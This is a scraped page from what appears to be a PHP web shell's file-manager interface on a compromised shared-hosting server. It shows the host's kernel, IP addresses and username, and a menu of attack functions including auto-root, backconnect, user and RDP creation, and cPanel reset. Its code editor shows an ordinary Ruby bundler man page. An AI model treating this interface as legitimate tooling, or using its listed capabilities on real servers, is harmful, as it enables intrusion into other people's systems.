Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.15.239.0
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby26 /
share /
man /
man1 /
[ HOME SHELL ]
Name
Size
Permission
Action
bundle-add.1
1.3
KB
-rw-r--r--
bundle-binstubs.1
1.69
KB
-rw-r--r--
bundle-check.1
966
B
-rw-r--r--
bundle-clean.1
604
B
-rw-r--r--
bundle-config.1
20.92
KB
-rw-r--r--
bundle-doctor.1
1.14
KB
-rw-r--r--
bundle-exec.1
6.6
KB
-rw-r--r--
bundle-gem.1
3.17
KB
-rw-r--r--
bundle-info.1
449
B
-rw-r--r--
bundle-init.1
1.05
KB
-rw-r--r--
bundle-inject.1
738
B
-rw-r--r--
bundle-install.1
16.38
KB
-rw-r--r--
bundle-list.1
871
B
-rw-r--r--
bundle-lock.1
3.12
KB
-rw-r--r--
bundle-open.1
581
B
-rw-r--r--
bundle-outdated.1
3.72
KB
-rw-r--r--
bundle-package.1
3.25
KB
-rw-r--r--
bundle-platform.1
1.31
KB
-rw-r--r--
bundle-pristine.1
1.64
KB
-rw-r--r--
bundle-remove.1
849
B
-rw-r--r--
bundle-show.1
690
B
-rw-r--r--
bundle-update.1
13.59
KB
-rw-r--r--
bundle-viz.1
1.08
KB
-rw-r--r--
bundle.1
3.42
KB
-rw-r--r--
erb.1
3.25
KB
-rw-r--r--
irb.1
3.37
KB
-rw-r--r--
ri.1
5.22
KB
-rw-r--r--
ruby.1
18.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bundle-pristine.1
.\" generated with Ronn/v0.7.3 .\" http://github.com/rtomayko/ronn/tree/0.7.3 . .TH "BUNDLE\-PRISTINE" "1" "November 2018" "" "" . .SH "NAME" \fBbundle\-pristine\fR \- Restores installed gems to their pristine condition . .SH "SYNOPSIS" \fBbundle pristine\fR . .SH "DESCRIPTION" \fBpristine\fR restores the installed gems in the bundle to their pristine condition using the local gem cache from RubyGems\. For git gems, a forced checkout will be performed\. . .P For further explanation, \fBbundle pristine\fR ignores unpacked files on disk\. In other words, this command utilizes the local \fB\.gem\fR cache or the gem\'s git repository as if one were installing from scratch\. . .P Note: the Bundler gem cannot be restored to its original state with \fBpristine\fR\. One also cannot use \fBbundle pristine\fR on gems with a \'path\' option in the Gemfile, because bundler has no original copy it can restore from\. . .P When is it practical to use \fBbundle pristine\fR? . .P It comes in handy when a developer is debugging a gem\. \fBbundle pristine\fR is a great way to get rid of experimental changes to a gem that one may not want\. . .P Why use \fBbundle pristine\fR over \fBgem pristine \-\-all\fR? . .P Both commands are very similar\. For context: \fBbundle pristine\fR, without arguments, cleans all gems from the lockfile\. Meanwhile, \fBgem pristine \-\-all\fR cleans all installed gems for that Ruby version\. . .P If a developer forgets which gems in their project they might have been debugging, the Rubygems \fBgem pristine [GEMNAME]\fR command may be inconvenient\. One can avoid waiting for \fBgem pristine \-\-all\fR, and instead run \fBbundle pristine\fR\.
Close